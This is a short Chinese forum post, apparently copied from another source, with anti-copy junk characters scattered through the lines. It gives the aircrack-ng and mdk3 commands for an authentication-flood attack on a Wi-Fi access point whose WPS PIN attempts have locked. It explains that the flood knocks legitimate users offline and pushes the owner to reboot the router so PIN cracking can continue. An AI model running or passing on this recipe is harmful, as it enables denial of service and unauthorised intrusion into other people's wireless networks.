上等兵
- 注册时间
- 2013-6-6
- 金币
- 48 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:2 天 连续签到:0 天 [LV.20]漫游旅程
|
发表于 2013-11-22 11:36
首先检测网卡:
/ T/ n" w, L" \2 y# mifconfig -a
# i/ n: C0 D0 G: v p然后模拟端口:
3 S s0 j8 c* x Iairmon-ng start wlan0$ j0 G" D- P9 N
接下来用:/ P% h/ {8 E; i0 p3 l* u8 K* z# K& H$ j2 ^
airodump-ng mon0' `* M6 n0 b9 a5 V* C& d) i. [0 {
扫描ap找到你pin死的路由器mac% n9 }) }6 ?# I7 b
用mdk3 做身份验证攻击
- g9 u, D: V- T7 U/ ?, K9 V3 b" ?mdk3 mon0 a -a mac(被pin死的路由器的mac)
! {9 l Z, T, M+ o身份验证攻击效果说明:$ v$ v3 U: d3 L' n% x. r4 ^
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。.1 O6 }- P0 J1 C1 o) l& \; z
/ e+ M! Q) n9 X$ t
以上是复制的 |
|